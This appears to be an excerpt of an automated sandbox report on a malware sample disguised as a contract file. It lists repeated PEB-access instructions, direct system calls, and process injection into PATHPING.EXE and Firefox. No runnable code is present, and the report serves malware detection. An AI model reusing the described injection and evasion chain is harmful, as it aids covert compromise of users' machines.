                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E908 mov eax, dword ptr fs:[00000030h]2_2_0177E908
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E908 mov eax, dword ptr fs:[00000030h]2_2_0177E908
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017329F9 mov eax, dword ptr fs:[00000030h]2_2_017329F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017329F9 mov eax, dword ptr fs:[00000030h]2_2_017329F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178E9E0 mov eax, dword ptr fs:[00000030h]2_2_0178E9E0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017349D0 mov eax, dword ptr fs:[00000030h]2_2_017349D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CA9D3 mov eax, dword ptr fs:[00000030h]2_2_017CA9D3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017969C0 mov eax, dword ptr fs:[00000030h]2_2_017969C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017889B3 mov esi, dword ptr fs:[00000030h]2_2_017889B3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017889B3 mov eax, dword ptr fs:[00000030h]2_2_017889B3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017889B3 mov eax, dword ptr fs:[00000030h]2_2_017889B3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017009AD mov eax, dword ptr fs:[00000030h]2_2_017009AD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017009AD mov eax, dword ptr fs:[00000030h]2_2_017009AD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796870 mov eax, dword ptr fs:[00000030h]2_2_01796870
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796870 mov eax, dword ptr fs:[00000030h]2_2_01796870
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178E872 mov eax, dword ptr fs:[00000030h]2_2_0178E872
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178E872 mov eax, dword ptr fs:[00000030h]2_2_0178E872
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01730854 mov eax, dword ptr fs:[00000030h]2_2_01730854
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704859 mov eax, dword ptr fs:[00000030h]2_2_01704859
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704859 mov eax, dword ptr fs:[00000030h]2_2_01704859
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01712840 mov ecx, dword ptr fs:[00000030h]2_2_01712840
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A483A mov eax, dword ptr fs:[00000030h]2_2_017A483A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A483A mov eax, dword ptr fs:[00000030h]2_2_017A483A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A830 mov eax, dword ptr fs:[00000030h]2_2_0173A830
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov ecx, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178C810 mov eax, dword ptr fs:[00000030h]2_2_0178C810
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C8F9 mov eax, dword ptr fs:[00000030h]2_2_0173C8F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C8F9 mov eax, dword ptr fs:[00000030h]2_2_0173C8F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CA8E4 mov eax, dword ptr fs:[00000030h]2_2_017CA8E4
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E8C0 mov eax, dword ptr fs:[00000030h]2_2_0172E8C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D08C0 mov eax, dword ptr fs:[00000030h]2_2_017D08C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178C89D mov eax, dword ptr fs:[00000030h]2_2_0178C89D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700887 mov eax, dword ptr fs:[00000030h]2_2_01700887
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FCB7E mov eax, dword ptr fs:[00000030h]2_2_016FCB7E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AEB50 mov eax, dword ptr fs:[00000030h]2_2_017AEB50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]2_2_017D2B57
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]2_2_017D2B57
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]2_2_017D2B57
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]2_2_017D2B57
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B4B4B mov eax, dword ptr fs:[00000030h]2_2_017B4B4B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B4B4B mov eax, dword ptr fs:[00000030h]2_2_017B4B4B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A8B42 mov eax, dword ptr fs:[00000030h]2_2_017A8B42
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796B40 mov eax, dword ptr fs:[00000030h]2_2_01796B40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796B40 mov eax, dword ptr fs:[00000030h]2_2_01796B40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CAB40 mov eax, dword ptr fs:[00000030h]2_2_017CAB40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8B50 mov eax, dword ptr fs:[00000030h]2_2_016F8B50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172EB20 mov eax, dword ptr fs:[00000030h]2_2_0172EB20
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172EB20 mov eax, dword ptr fs:[00000030h]2_2_0172EB20
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C8B28 mov eax, dword ptr fs:[00000030h]2_2_017C8B28
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C8B28 mov eax, dword ptr fs:[00000030h]2_2_017C8B28
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4B00 mov eax, dword ptr fs:[00000030h]2_2_017D4B00
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708BF0 mov eax, dword ptr fs:[00000030h]2_2_01708BF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708BF0 mov eax, dword ptr fs:[00000030h]2_2_01708BF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708BF0 mov eax, dword ptr fs:[00000030h]2_2_01708BF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178CBF0 mov eax, dword ptr fs:[00000030h]2_2_0178CBF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172EBFC mov eax, dword ptr fs:[00000030h]2_2_0172EBFC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AEBD0 mov eax, dword ptr fs:[00000030h]2_2_017AEBD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01720BCB mov eax, dword ptr fs:[00000030h]2_2_01720BCB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01720BCB mov eax, dword ptr fs:[00000030h]2_2_01720BCB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01720BCB mov eax, dword ptr fs:[00000030h]2_2_01720BCB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700BCD mov eax, dword ptr fs:[00000030h]2_2_01700BCD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700BCD mov eax, dword ptr fs:[00000030h]2_2_01700BCD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700BCD mov eax, dword ptr fs:[00000030h]2_2_01700BCD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B4BB0 mov eax, dword ptr fs:[00000030h]2_2_017B4BB0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B4BB0 mov eax, dword ptr fs:[00000030h]2_2_017B4BB0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710BBE mov eax, dword ptr fs:[00000030h]2_2_01710BBE
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710BBE mov eax, dword ptr fs:[00000030h]2_2_01710BBE
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177CA72 mov eax, dword ptr fs:[00000030h]2_2_0177CA72
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177CA72 mov eax, dword ptr fs:[00000030h]2_2_0177CA72
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AEA60 mov eax, dword ptr fs:[00000030h]2_2_017AEA60
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173CA6F mov eax, dword ptr fs:[00000030h]2_2_0173CA6F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173CA6F mov eax, dword ptr fs:[00000030h]2_2_0173CA6F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173CA6F mov eax, dword ptr fs:[00000030h]2_2_0173CA6F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710A5B mov eax, dword ptr fs:[00000030h]2_2_01710A5B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710A5B mov eax, dword ptr fs:[00000030h]2_2_01710A5B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01724A35 mov eax, dword ptr fs:[00000030h]2_2_01724A35
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173CA24 mov eax, dword ptr fs:[00000030h]2_2_0173CA24
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172EA2E mov eax, dword ptr fs:[00000030h]2_2_0172EA2E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178CA11 mov eax, dword ptr fs:[00000030h]2_2_0178CA11
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173AAEE mov eax, dword ptr fs:[00000030h]2_2_0173AAEE
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700AD0 mov eax, dword ptr fs:[00000030h]2_2_01700AD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01734AD0 mov eax, dword ptr fs:[00000030h]2_2_01734AD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01756ACC mov eax, dword ptr fs:[00000030h]2_2_01756ACC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708AA0 mov eax, dword ptr fs:[00000030h]2_2_01708AA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01756AA4 mov eax, dword ptr fs:[00000030h]2_2_01756AA4
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01738A90 mov edx, dword ptr fs:[00000030h]2_2_01738A90
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170EA80 mov eax, dword ptr fs:[00000030h]2_2_0170EA80
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory written: C:\Users\user\Desktop\draft contract for order #782334.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: NULL target: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: NULL target: C:\Windows\SysWOW64\PATHPING.EXE protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEThread register set: target process: 6468Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEThread APC queued: target process: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess created: C:\Users\user\Desktop\draft contract for order #782334.exe "C:\Users\user\Desktop\draft contract for order #782334.exe"Jump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: RprkEKYwQARXc.exe, 00000006.00000000.2005296610.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135168037.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135430509.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
